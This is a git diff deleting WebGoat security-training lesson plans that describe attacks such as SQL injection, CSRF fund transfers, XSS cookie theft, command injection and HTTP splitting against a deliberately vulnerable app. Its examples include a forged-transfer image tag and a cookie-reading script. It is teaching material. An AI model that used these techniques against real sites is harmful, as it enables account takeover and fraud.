Lehrplan: Einen Authentisierungs Cookie fa¨lschen
-
-
-Lehrinhalt:
-
-Viele Webapplikationen erlauben es einem Benutzer sofort eingeloggt zu sein, sobald der Benutzer den richtigen Authentisierungs Cookie übergibt.
-Manchmal kann der richtige Wert dieses Cookies geraten werden, wenn der Algorithmus zur Generierung dieser Cookies bekannt ist.
-Der Cookie kann auch von dem Computer des Benutzers gestohlen werden indem andere Schwachstellen in seinem System ausgenutzt werden.
-Mittels Cross Site Scripting (XSS) kann der Cookie auch abgefangen werden.
-Diese Übung soll Sie auf das Thema der Authentisierungs Cookies aufmerksam machen und gibt Ihnen
-die Möglichkeit die Authentisierungsmethode dieser Lektion zu überwinden.
-
-
-
-Grundsätzliche(s) Ziel(e):
-
- Es ist Ihre Aufgabe die Authentisierung zu umgehen. Melden Sie sich mit dem Benutzernamen "webgoat" und dem Passwort "webgoat" an
- und schauen Sie was passiert. Sie können auch versuchen Sich mit aspect/aspect anzumelden. Wenn Sie den Authentisierungs Cookie verstehen,
- versuchen Sie Ihre Identität zu "alice" zu wechseln.
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/AccessControlMatrix.html b/src/main/webapp/lesson_plans/en/AccessControlMatrix.html
deleted file mode 100644
index 576bf3b72..000000000
--- a/src/main/webapp/lesson_plans/en/AccessControlMatrix.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Lesson Plan Title: Using an Access Control Matrix
-
-Concept / Topic To Teach:
-
-In a role-based access control scheme, a role represents a set of access permissions and privileges. A user can be assigned one or more roles. A role-based access control scheme normally consists of two parts: role permission management and role assignment. A broken role-based access control scheme might allow a user to perform accesses that are not allowed by his/her assigned roles, or somehow allow privilege escalation to an unauthorized role.
-General Goal(s):
-Each user is a member of a role that is allowed to access only certain resources. Your goal is to explore the access control rules that govern this site. Only the [Admin] group should have access to the 'Account Manager' resource.
-
diff --git a/src/main/webapp/lesson_plans/en/BackDoors.html b/src/main/webapp/lesson_plans/en/BackDoors.html
deleted file mode 100644
index c4ac8a08a..000000000
--- a/src/main/webapp/lesson_plans/en/BackDoors.html
+++ /dev/null
@@ -1,23 +0,0 @@
-
-
Lesson Plan Title: How to Create Database Back Door Attacks.
-
-
-Concept / Topic To Teach:
-How to Create Database Back Door Attacks.
-
-
-
-How the attacks works:
-
-Databases are used usually as a backend for web applications. Also it is used as a media of storage. It can also
-be used as a place to store a malicious activity such as a trigger. A trigger is called by the database management
-system upon the execution of another database operation like insert, select, update or delete. An attacker for example
-can create a trigger that would set his email address instead of every new user's email address.
-
-General Goal(s):
-
-* Your goal should be to learn how you can exploit a vulnerable query to create a trigger.
-* You will not be able to actually create one in this lesson because the underlying database engine used with WebGoat doesn't support triggers.
-* Your login ID is 101.
-
-
diff --git a/src/main/webapp/lesson_plans/en/BasicAuthentication.html b/src/main/webapp/lesson_plans/en/BasicAuthentication.html
deleted file mode 100644
index 73a3c736d..000000000
--- a/src/main/webapp/lesson_plans/en/BasicAuthentication.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Lesson Plan Title: Basic Authentication
-
-Concept / Topic To Teach:
-
-Basic Authentication is used to protect server side resources. The web server will send a 401 authentication request with the response for the requested resource. The client side browser will then prompt the user for a user name and password using a browser supplied dialog box. The browser will base64 encode the user name and password and send those credentials back to the web server. The web server will then validate the credentials and return the requested resource if the credentials are correct. These credentials are automatically resent for each page protected with this mechanism without requiring the user to enter their credentials again.
-General Goal(s):
-For this lesson, your goal is to understand Basic Authentication and answer the questions below.
-
diff --git a/src/main/webapp/lesson_plans/en/BlindSqlInjection.html b/src/main/webapp/lesson_plans/en/BlindSqlInjection.html
deleted file mode 100644
index 0ff76e32e..000000000
--- a/src/main/webapp/lesson_plans/en/BlindSqlInjection.html
+++ /dev/null
@@ -1,15 +0,0 @@
-
-
Lesson Plan Title: How to Perform Blind SQL Injection
-
-
-Concept / Topic To Teach:
-
-SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks an incredible number of systems on the internet are susceptible to this form of attack.
-
-Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can be almost totally prevented. This lesson will show the student several examples of SQL injection.
-
-It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries.
-
-
-General Goal(s):
-The form below allows a user to enter an account number and determine if it is valid or not. Use this form to develop a true / false test check other entries in the database. Reference Ascii Values: 'A' = 65 'Z' = 90 'a' = 97 'z' = 122 The goal is to find the value of the first_name in table user_data for userid 15613. Put that name in the form to pass the lesson.
diff --git a/src/main/webapp/lesson_plans/en/BufferOverflow.html b/src/main/webapp/lesson_plans/en/BufferOverflow.html
deleted file mode 100644
index b25b4f944..000000000
--- a/src/main/webapp/lesson_plans/en/BufferOverflow.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Lesson Plan Title: How to Exploit Buffer Overflows
-
-
-Concept / Topic To Teach:
-How to Exploit Buffer Overflows.
-General Goal(s):
-This lesson needs a creator!
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/CSRF.html b/src/main/webapp/lesson_plans/en/CSRF.html
deleted file mode 100644
index 594d049bd..000000000
--- a/src/main/webapp/lesson_plans/en/CSRF.html
+++ /dev/null
@@ -1,26 +0,0 @@
-
-
Lesson Plan Title: How to Perform Cross Site Request Forgery.
-
-
-Concept / Topic To Teach:
- This lesson teaches how to perform Cross Site Request Forgery (CSRF) attacks.
-
-
-
-How the attacks works:
-
-Cross-Site Request Forgery (CSRF/XSRF) is an attack that tricks the victim into loading a page that contains img links like the one below:
-
-
<img src="http://www.mybank.com/sendFunds.do?acctId=123456 "/>
-
-When the victim's browser attempts to render this page, it will issue a request to www.mybank.com to the transferFunds.do page with the specified parameters. The browser will think the link is to get an image, even though it actually is a funds transfer function.
-
-The request will include any cookies associated with the site. Therefore, if the user has authenticated to the site, and has either a permanent cookie or even a current session cookie, the site will have no way to distinguish this from a legitimate user request.
-
-In this way, the attacker can make the victim perform actions that they didn't intend to, such as logout, purchase item, or any other function provided by the vulnerable website
-
-General Goal(s):
-
-Your goal is to send an email to a newsgroup that contains an image whose URL is pointing to a malicious request. Try to include a 1x1 pixel image that includes a URL. The URL should point to the CSRF lesson with an extra parameter "transferFunds=4000". You can copy the shortcut from the left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever receives this email and happens to be authenticated at that time will have his funds transferred. When you think the attack is successful, refresh the page and you will find the green check on the left hand side menu.Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.
-
-
diff --git a/src/main/webapp/lesson_plans/en/ChallengeScreen.html b/src/main/webapp/lesson_plans/en/ChallengeScreen.html
deleted file mode 100644
index b3d9b3321..000000000
--- a/src/main/webapp/lesson_plans/en/ChallengeScreen.html
+++ /dev/null
@@ -1,7 +0,0 @@
-
-
Lesson Plan Title: Putting it all together
-
-Concept / Topic To Teach:
-This lesson creates a challenge that will help the student apply all that they have learned.
-General Goal(s):
-Display the secret message.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/ClientSideFiltering.html b/src/main/webapp/lesson_plans/en/ClientSideFiltering.html
deleted file mode 100644
index 608c360e5..000000000
--- a/src/main/webapp/lesson_plans/en/ClientSideFiltering.html
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
Lesson Plan Title: Client Side Filtering
-
-Concept / Topic To Teach:
-
-It is always a good practice to send to the client only information which they are supposed
-to have access to. In this lesson, too much information is being sent to the client, creating
-a serious access control problem.
-
-General Goal(s):
-For this exercise, your mission is exploit the extraneous information being returned by the
-server to discover information to which you should not have access.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/ClientSideValidation.html b/src/main/webapp/lesson_plans/en/ClientSideValidation.html
deleted file mode 100644
index e712b6fb7..000000000
--- a/src/main/webapp/lesson_plans/en/ClientSideValidation.html
+++ /dev/null
@@ -1,15 +0,0 @@
-
-
Lesson Plan Title: Insecure Client Storage
-
-Concept / Topic To Teach:
-
-It is always a good practice to validate all input on the server side. Leaving the
-mechanism for validation on the client side leaves it vulnerable to reverse
-engineering. Remember, anything on the client side should not be
-considered a secret.
-
-General Goal(s):
-For this exercise, your mission is to discover a coupon code to receive an unintended
-discount. Then, exploit the use of client side validation to submit an order with a
-cost of zero.
-
diff --git a/src/main/webapp/lesson_plans/en/CommandInjection.html b/src/main/webapp/lesson_plans/en/CommandInjection.html
deleted file mode 100644
index 1db97ab80..000000000
--- a/src/main/webapp/lesson_plans/en/CommandInjection.html
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
Lesson Plan Title: How to Perform Command Injection
-
-Concept / Topic To Teach:
-
-Command injection attacks represent a serious threat to any parameter-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks an incredible number of systems on the internet are susceptible to this form of attack.
-Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can be almost totally prevented. This lesson will show the student several examples of parameter injection.
-It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries.
-Try to inject a command to the operating system.
-
-General Goal(s):
-The user should be able to execute any command on the hosting OS.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/ConcurrencyCart.html b/src/main/webapp/lesson_plans/en/ConcurrencyCart.html
deleted file mode 100644
index 4a2f44b75..000000000
--- a/src/main/webapp/lesson_plans/en/ConcurrencyCart.html
+++ /dev/null
@@ -1,22 +0,0 @@
-
-
-
-
-
- Lesson Plan
-
-
-
-
-
Lesson Plan Title: Shopping Cart Concurrency Flaw
-
-
-Concept / Topic To Teach:
-
- Web applications can handle many HTTP requests simultaneously. Developers often use variables that are not thread safe. Thread safety means that the fields of an object or class always maintain a valid state when used concurrently by multiple threads. It is often possible to exploit a concurrency bug by loading the same page as another user at the exact same time. Because all threads share the same method area, and the method area is where all class variables are stored, multiple threads can attempt to use the same class variables concurrently.
-
-General Goal(s):
-For this exercise, your mission is to exploit the concurrency issue which will allow you to purchase merchandise for a lower price.
-
-
-
diff --git a/src/main/webapp/lesson_plans/en/CrossSiteScripting.html b/src/main/webapp/lesson_plans/en/CrossSiteScripting.html
deleted file mode 100644
index 1d2848f3c..000000000
--- a/src/main/webapp/lesson_plans/en/CrossSiteScripting.html
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
Lesson Plan Title: How to Perform Cross Site Scripting (XSS)
-
-Concept / Topic To Teach:
-
-It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved.
-XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it.
-
-General Goal(s):
-For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks.
-
-
diff --git a/src/main/webapp/lesson_plans/en/CsrfPromptByPass.html b/src/main/webapp/lesson_plans/en/CsrfPromptByPass.html
deleted file mode 100644
index 7a505f2ac..000000000
--- a/src/main/webapp/lesson_plans/en/CsrfPromptByPass.html
+++ /dev/null
@@ -1,33 +0,0 @@
-
-
Lesson Plan Title: CSRF User Prompt By-Pass
-
-
-Concept / Topic To Teach:
-This lesson teaches how to perform CSRF attacks that by-pass user confirmation prompts.
-
-
-
-How the attacks works:
-
-Cross-Site Request Forgery (CSRF/XSRF) is an attack that tricks the victim into loading a page
-that contains a 'forged request' to execute commands with the victim's credentials. Prompting
-a user to confirm or cancel the command might sound like a solution, but can be by-passed if
-the prompt is scriptable. This lesson shows how to by-pass such a prompt by issuing another
-forged request. This can also apply to a series of prompts such as a wizard or issuing multiple
-unrelated forged requests.
-
-
-
-General Goal(s):
-
-Similar to the CSRF Lesson, your goal is to send an email to a newsgroup that contains multiple
-malicious requests: the first to transfer funds, and the second a request to confirm the prompt
-that the first request triggered. The URL should point to the CSRF lesson with an extra
-parameter "transferFunds=4000", and "transferFunds=CONFIRM". You can copy the shortcut from the
-left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever
-receives this email and happens to be authenticated at that time will have his funds transferred.
-When you think the attack is successful, refresh the page and you will find the green check on
-the left hand side menu.
-Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.
-
-
diff --git a/src/main/webapp/lesson_plans/en/CsrfTokenByPass.html b/src/main/webapp/lesson_plans/en/CsrfTokenByPass.html
deleted file mode 100644
index b57ea6b83..000000000
--- a/src/main/webapp/lesson_plans/en/CsrfTokenByPass.html
+++ /dev/null
@@ -1,38 +0,0 @@
-
-
Lesson Plan Title: CSRF Token Prompt By-Pass
-
-
-Concept / Topic To Teach:
-This lesson teaches how to perform CSRF attacks on sites that use tokens to mitigate CSRF attacks, but are vulnerable to CSS attacks.
-
-
-
-How the attacks works:
-
-
-Cross-Site Request Forgery (CSRF/XSRF) is an attack that tricks the victim into
-loading a page that contains a 'forged request' to execute commands with the
-victim's credentials.
-
-
Token-based request authentication mitigates these attacks. This technique
-inserts tokens into pages that issue requests. These tokens are required to
-complete a request, and help verify that requests are not scripted. CSRFGuard from OWASP uses
-this technique to help prevent CSRF attacks.
-
-
However, this technique can be by-passed if CSS vulnerabilities exist on the same site.
-Because of the same-origin browser policy, pages from the same domain can read content from
-other pages from the same domain.
-
-
-General Goal(s):
-
-Similar to the CSRF Lesson, your goal is to send an email to a newsgroup that contains a malicious
-request to transfer funds. To successfully complete you need to obtain a valid request token.
-The page that presents the transfer funds form contains a valid request token. The URL for the
-transfer funds page is the same as this lesson with an extra parameter "transferFunds=main". Load
-this page, read the token and append the token in a forged request to transferFunds. When you think
-the attack is successful, refresh the page and you will find the green check on the left hand side menu.
-Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.
-
-
-
diff --git a/src/main/webapp/lesson_plans/en/DBCrossSiteScripting.html b/src/main/webapp/lesson_plans/en/DBCrossSiteScripting.html
deleted file mode 100644
index a54fd9ab9..000000000
--- a/src/main/webapp/lesson_plans/en/DBCrossSiteScripting.html
+++ /dev/null
@@ -1,24 +0,0 @@
-
-
Lesson Plan Title: How to Perform Cross Site Scripting
-(XSS)
-
-Concept / Topic To Teach:
-
-It is always a good practice to scrub all inputs, especially those
-inputs that will later be used as parameters to OS commands, scripts,
-and database queries. It is particularly important for content that will
-be permanently stored somewhere. Users should not be able to create
-message content that could cause another user to load an undesirable
-page or undesirable content when the user's message is retrieved.
-
-XSS can also occur when unvalidated user input is used in an HTTP
-response. In a reflected XSS attack, an attacker can craft a URL with
-the attack script and post it to another website, email it, or otherwise
-get a victim to click on it.
-
-General Goal(s):
-For this exercise, you will perform a stored XSS attack.
-You will also implement code changes in the database to defeat
-these attacks.
-
-
diff --git a/src/main/webapp/lesson_plans/en/DBSQLInjection.html b/src/main/webapp/lesson_plans/en/DBSQLInjection.html
deleted file mode 100644
index 879a1b92e..000000000
--- a/src/main/webapp/lesson_plans/en/DBSQLInjection.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
Lesson Plan Title: How to Perform SQL Injection
-
-Concept / Topic To Teach:
-
-It is always a good practice to scrub all inputs, especially those
-inputs that will later be used as parameters to OS commands, scripts,
-and database queries. Users should not be able to alter the intent of
-commands that are executed on the server, in many cases as a privileged user.
-
-General Goal(s):
-For this exercise, you will perform a SQL Injection attack.
-You will also implement code changes in the database to defeat
-these attacks.
-
-
diff --git a/src/main/webapp/lesson_plans/en/DOMInjection.html b/src/main/webapp/lesson_plans/en/DOMInjection.html
deleted file mode 100644
index 19c19ee0b..000000000
--- a/src/main/webapp/lesson_plans/en/DOMInjection.html
+++ /dev/null
@@ -1,23 +0,0 @@
-
-
Lesson Plan Title: How to Perform DOM Injection Attack.
-
-
-Concept / Topic To Teach:
-How to perform DOM injection attacks.
-
-
-
-How the attacks works:
-
-Some applications specially the ones that uses AJAX manipulates and updates the DOM
-directly using javascript, DHTML and eval() method.
-An attacker may take advantage of that by intercepting the reply and try to inject some
-javascript commands to exploit his attacks.
-
-General Goal(s):
-
-* Your victim is a system that takes an activation key to allow you to use it.
-* Your goal should be to try to get to enable the activate button.
-* Take some time to see the HTML source in order to understand how the key validation process works.
-
-
diff --git a/src/main/webapp/lesson_plans/en/DOMXSS.html b/src/main/webapp/lesson_plans/en/DOMXSS.html
deleted file mode 100644
index fb7008727..000000000
--- a/src/main/webapp/lesson_plans/en/DOMXSS.html
+++ /dev/null
@@ -1,15 +0,0 @@
-
-
Lesson Plan Title: DOM Based Cross Site Scripting (XSS)
-
-Concept / Topic To Teach:
-
-The Document Object Model (DOM) presents an interesting problem from
-a security standpoint. It allows the content of a web page to be dynamically
-modified, but that can be abused by attackers during a malicious code injection. XSS,
-a type of malicious code injection, can occur when unvalidated user input is used directly
-to modify the content of a page on the client side.
-
-General Goal(s):
-For this exercise, your mission is to use this vulnerability to inject
-malicious code into the DOM. Then in the last stage, you will correct
-the flaws in the code to address the vulnerability.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/DOS_Login.html b/src/main/webapp/lesson_plans/en/DOS_Login.html
deleted file mode 100644
index 941a89b49..000000000
--- a/src/main/webapp/lesson_plans/en/DOS_Login.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Lesson Plan Title: Denial of Service from Multiple Logins
-
-Concept / Topic To Teach:
-
-Denial of service attacks are a major issue in web applications. If the end user cannot conduct business or perform the service offered by the web application, then both time and money is wasted.
-General Goal(s):
-This site allows a user to login multiple times. This site has a database connection pool that allows 2 connections. You must obtain a list of valid users and create a total of 3 logins.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/DangerousEval.html b/src/main/webapp/lesson_plans/en/DangerousEval.html
deleted file mode 100644
index f6190530c..000000000
--- a/src/main/webapp/lesson_plans/en/DangerousEval.html
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
Lesson Plan Title: Dangerous Use of Eval
-
-Concept / Topic To Teach:
-
-It is always a good practice to validate all input on the server side. XSS can occur
-when unvalidated user input is reflected directly into an HTTP response. In this lesson, unvalidated
-user-supplied data is used in conjunction with a Javascript eval() call. In a reflected
-XSS attack, an attacker can craft a URL with the attack script and store it on another
-website, email it, or otherwise trick a victim into clicking on it.
-
-General Goal(s):
-For this exercise, your mission is to come up with some input which, when run through eval,
-will execute a malicious script. In order to pass this lesson, you must 'alert()' document.cookie.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/Encoding.html b/src/main/webapp/lesson_plans/en/Encoding.html
deleted file mode 100644
index fcba2ddac..000000000
--- a/src/main/webapp/lesson_plans/en/Encoding.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Lesson Plan Title: How to Peform Basic Encoding
-
-Concept / Topic To Teach:
-
-Different encoding schemes can be used in web applications for different reasons.
-
-General Goal(s):
-This lesson will familiarize the user with different encoding schemes.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/FailOpenAuthentication.html b/src/main/webapp/lesson_plans/en/FailOpenAuthentication.html
deleted file mode 100644
index 27a82e2cf..000000000
--- a/src/main/webapp/lesson_plans/en/FailOpenAuthentication.html
+++ /dev/null
@@ -1,10 +0,0 @@
-
-
Lesson Plan Title: How to Bypass Fail Open Authentication
-
-
-Concept / Topic To Teach:
-
- This lesson presents the basics for understanding the "fail open" condition regarding authentication. The security term, “fail open” describes a behavior of a verification mechanism. This is when an error (i.e. unexpected exception) occurs during a verification method causing that method to evaluate to true. This is especially dangerous during login.
-
-General Goal(s):
- The user should be able to bypass the authentication check.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/ForcedBrowsing.html b/src/main/webapp/lesson_plans/en/ForcedBrowsing.html
deleted file mode 100644
index 2bf4fa6a4..000000000
--- a/src/main/webapp/lesson_plans/en/ForcedBrowsing.html
+++ /dev/null
@@ -1,21 +0,0 @@
-
-
Lesson Plan Title: How to Perform Forced Browsing Attacks.
-
-
-Concept / Topic To Teach:
-How to Exploit Forced Browsing.
-
-
-
-How the attacks works:
-
-Forced browsing is a technique used by attackers to gain access to resources that are not referenced, but are nevertheless accessible.
-
-One technique is to manipulate the URL in the browser by deleting sections from the end until an unprotected directory is found
-
-General Goal(s):
-
-* Your goal should be to try to guess the URL for the "config" interface.
-* The "config" URL is only available to the maintenance personnel.
-* The application doesn't check for horizontal privileges.
-
diff --git a/src/main/webapp/lesson_plans/en/ForgotPassword.html b/src/main/webapp/lesson_plans/en/ForgotPassword.html
deleted file mode 100644
index 06b2feb2f..000000000
--- a/src/main/webapp/lesson_plans/en/ForgotPassword.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Lesson Plan Title: How to Exploit the Forgot Password Page
-
-Concept / Topic To Teach:
-
-Web applications frequently provide their users the ability to retrieve a forgotten password. Unfortunately, many web applications fail to implement the mechanism properly. The information required to verify the identity of the user is often overly simplistic.
-General Goal(s):
-Users can retrieve their password if they can answer the secret question properly. There is no lock-out mechanism on this 'Forgot Password' page. Your username is 'webgoat' and your favorite color is 'red'. The goal is to retrieve the password of another user.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/HiddenFieldTampering.html b/src/main/webapp/lesson_plans/en/HiddenFieldTampering.html
deleted file mode 100644
index dff0d945e..000000000
--- a/src/main/webapp/lesson_plans/en/HiddenFieldTampering.html
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
Lesson Plan Title: How to Exploit Hidden Fields
-
-Concept / Topic To Teach:
-
-Developers will use hidden fields for tracking, login, pricing, etc.. information on a loaded page. While this is a convenient and easy mechanism for the developer, they often don't validate the information that is received from the hidden field. This lesson will teach the attacker to find and modify hidden fields to obtain a product for a price other than the price specified
-
-General Goal(s):
-The user should be able to exploit a hidden field to obtain a product at an incorrect price.
-
-Try to purchase the HDTV for less than the purchase price, if you have not done so already.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/HowToWork.html b/src/main/webapp/lesson_plans/en/HowToWork.html
deleted file mode 100644
index d99f61dc2..000000000
--- a/src/main/webapp/lesson_plans/en/HowToWork.html
+++ /dev/null
@@ -1,68 +0,0 @@
-
-How To Work With WebGoat
-
-Welcome to a brief overview of WebGoat.
-
-Environment Information
-
-WebGoat uses the Apache Tomcat server but can run in any application server. It is configured to run on
-localhost although this can be easily changed, see the "Tomcat Configuration" section in the Introduction.
-
-The WebGoat Interface
-
-
-1. Lesson Categories in WebGoat. Click on a Category to see specific Lessons.
-2. This will show the underlying Java source code.
-3. This will show the complete solution of the selected lesson.
-4. This will show goals and objectives of the lesson.
-5. This will show technical hints to solve the lesson.
-6. This shows the HTTP request data
-7. If you want to restart a lesson you can use this link.
-Solve The Lesson
-
-Always start with the lesson plan. Then try to solve the lesson and if necessary,
-use the hints. The last hint is the solution text if applicable. If you cannot solve the lesson using the hints, you may view the
-solution for complete details.
-
-Read And Edit Parameters/Cookies
-
-To read and edit parameters and cookies you need a local proxy like OWASP ZAP to intercept the HTTP request.
- More information on ZAP can be found in the "Useful Tools" section in the Introduction.
-
-
-Configuring new WebGoat users
-
-WebGoat uses spring-security.xml to configure users.
-
-
-<!-- Authentication Manager -->
-<authentication-manager alias="authenticationManager">
- <authentication-provider>
- <user-service>
- <user name="guest" password="guest" authorities="ROLE_WEBGOAT_USER" />
- <user name="webgoat" password="webgoat" authorities="ROLE_WEBGOAT_ADMIN" />
- <user name="server" password="server" authorities="ROLE_SERVER_ADMIN" />
- </user-service>
- </authentication-provider>
-</authentication-manager>
-
-
-Adding Users
-
-Usually WebGoat only requires logging in with the user:guest and password:guest.
- But maybe in laboratory you have made a setup with one server and a lot of
-clients. In this case you might want to have a user for every client,
- you will have to alter /WEB-INF/spring-security.xml to add additional users. We recommend not to use real passwords
-as the passwords are stored in plain text in this file!
-
-Adding a new User
-
-Adding a user is straight forward. You can use the guest entry as an example. The added
-users should have the same role as the guest user. The new user/password will not show on the login page.
-Add lines like this to the /WEB-INF/spring-security.xml file:
-
-
-<user name="guest2" password="guest2" authorities="ROLE_WEBGOAT_USER" />
-...
-
-
diff --git a/src/main/webapp/lesson_plans/en/HtmlClues.html b/src/main/webapp/lesson_plans/en/HtmlClues.html
deleted file mode 100644
index c0d81446c..000000000
--- a/src/main/webapp/lesson_plans/en/HtmlClues.html
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
Lesson Plan Title: How to Discover Clues in the HTML
-
-
-Concept / Topic To Teach:
-
- Developers are notorious for leaving statements like FIXME's, TODO's, Code Broken, Hack, etc... inside the source code. Review the source code for any comments denoting passwords, backdoors, or something doesn't work right.
- Below is an example of a forms based authentication form. Look for clues to help you log in.
-
-
-General Goal(s):
-The user should be able to bypass the authentication check.
diff --git a/src/main/webapp/lesson_plans/en/HttpBasics.html b/src/main/webapp/lesson_plans/en/HttpBasics.html
deleted file mode 100644
index f3321f295..000000000
--- a/src/main/webapp/lesson_plans/en/HttpBasics.html
+++ /dev/null
@@ -1,27 +0,0 @@
-
-
Lesson Plan Title: Http Basics
-
-
-Concept / Topic To Teach:
- This lesson presents the basics for understanding the transfer of data between the browser and the web application.
-
-
-How HTTP works:
-
-All HTTP transactions follow the same general format. Each client request and server response has three parts: the request or response line, a header section and the entity body. The client initiates a transaction as follows:
-
- The client contacts the server and sends a document request
-
-
-GET /index.html?param=value HTTP/1.0
- Next, the client sends optional header information to inform the server of its configuration and the document formats it will accept.
-
-User-Agent: Mozilla/4.06 Accept: image/gif,image/jpeg, */*
-After sending the request and headers, the client may send additional data. This data is mostly used by CGI programs using the POST method.
-General Goal(s):
-
-Enter your name in the input field below and press "Go!" to submit. The server will accept the request, reverse the input and display it back to the user, illustrating the basics of handling an HTTP request.
-
-The user should become familiar with the features of WebGoat by manipulating the above
-buttons to view hints, show the HTTP request parameters, the HTTP request cookies, and the Java source code. You may also try using OWASP Zed Attack Proxy for the first time.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/HttpOnly.html b/src/main/webapp/lesson_plans/en/HttpOnly.html
deleted file mode 100644
index aea12470c..000000000
--- a/src/main/webapp/lesson_plans/en/HttpOnly.html
+++ /dev/null
@@ -1,26 +0,0 @@
-
-
Lesson Plan Title: HttpOnly Test
-
-Concept / Topic To Teach:
-
-To help mitigate the cross site scripting threat, Microsoft has
-introduced a new cookie attribute entitled 'HttpOnly.' If this flag is
-set, then the browser should not allow client-side script to access the
-cookie. Since the attribute is relatively new, several browsers neglect
-to handle the new attribute properly.
-For a list of supported browsers see: OWASP HTTPOnly Support
-
General Goal(s):
-The purpose of this lesson is to test whether your browser supports the
-HTTPOnly cookie flag. Note the value of the
-unique2u
-cookie. If your browser supports HTTPOnly, and you enable it for a
-cookie, client side code should NOT be able to read OR write to that
-cookie, but the browser can still send its value to the server. Some
-browsers only prevent client side read access, but don't prevent write
-access.
-
-
-With the HTTPOnly attribute turned on, type
-"javascript:alert(document.cookie)" in the browser address bar. Notice
-all cookies are displayed except the unique2u cookie.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/HttpSplitting.html b/src/main/webapp/lesson_plans/en/HttpSplitting.html
deleted file mode 100644
index ac0906a93..000000000
--- a/src/main/webapp/lesson_plans/en/HttpSplitting.html
+++ /dev/null
@@ -1,34 +0,0 @@
-
-
Lesson Plan Title: How to Perform HTTP Splitting
-
-
-Concept / Topic To Teach:
- This lesson teaches how to perform HTTP Splitting attacks.
-
-
-
-How the attack works:
-
-
The attacker passes malicious code to the web server together with normal input.
-A victim application will not be checking for CR (carriage return, also given by %0d or \r)
-and LF (line feed, also given by %0a or \n) characters. These characters not only give attackers control
-of the remaining headers and body of the response the application intends to send,
-but they also allows them to create additional responses entirely under their control.
-
The effect of an HTTP Splitting attack is maximized when accompanied with a Cache Poisoning. The goal of
-Cache Poisoning attack is to poison the cache of the victim by fooling the cache into believing that the page
-hijacked using the HTTP splitting is an authentic version of the server's copy.
-
The attack works by using the HTTP Splitting attack plus adding the Last-Modified: header and setting it
-to a future date. This forces the browser to send an incorrect If-Modified-Since request header on future requests.
-Because of this, the server will always report that the (poisoned) page has not changed, and the victim's browser
-will continue to display the attacked version of the page.
-
A sample of a 304 response is:
-
HTTP/1.1 304 Not Modified
-Date: Fri, 30 Dec 2005 17:32:47 GMT
-
-
-General Goal(s):
-
-This lesson has two stages. Stage 1 teaches you how to do HTTP Splitting attacks while stage 2 builds on that to teach you how to elevate HTTP Splitting to Cache Poisoning.
-Enter a language for the system to search by. You will notice that the application is redirecting your request to another resource on the server. You should be able to use the CR (%0d) and LF (%0a) characters to exploit the attack. Your goal should be to force the server to send a 200 OK. If the screen changed as an effect to your attack, just go back to the homepage. After stage 2 is exploited successfully, you will find the green check in the left menu.
-
-
diff --git a/src/main/webapp/lesson_plans/en/InsecureLogin.html b/src/main/webapp/lesson_plans/en/InsecureLogin.html
deleted file mode 100644
index a33256309..000000000
--- a/src/main/webapp/lesson_plans/en/InsecureLogin.html
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
Lesson Plan Title: Insecure Login
-
-Concept / Topic To Teach:
-
-Sensitive data should never sent in plaintext! Often applications
-switch to a secure connection after the authorization. An attacker
-could just sniff the login and use the gathered information to
-break into an account. A good webapplication always takes care of
-encrypting sensitive data.
-General Goal(s):
-See how easy it is to sniff a password in plaintext.
-Understand the advantages of encrypting the login data!
-
diff --git a/src/main/webapp/lesson_plans/en/JSONInjection.html b/src/main/webapp/lesson_plans/en/JSONInjection.html
deleted file mode 100644
index 4c72bd04f..000000000
--- a/src/main/webapp/lesson_plans/en/JSONInjection.html
+++ /dev/null
@@ -1,24 +0,0 @@
-
-
Lesson Plan Title: How to Perform JSON Injection
-
-
-Concept / Topic To Teach:
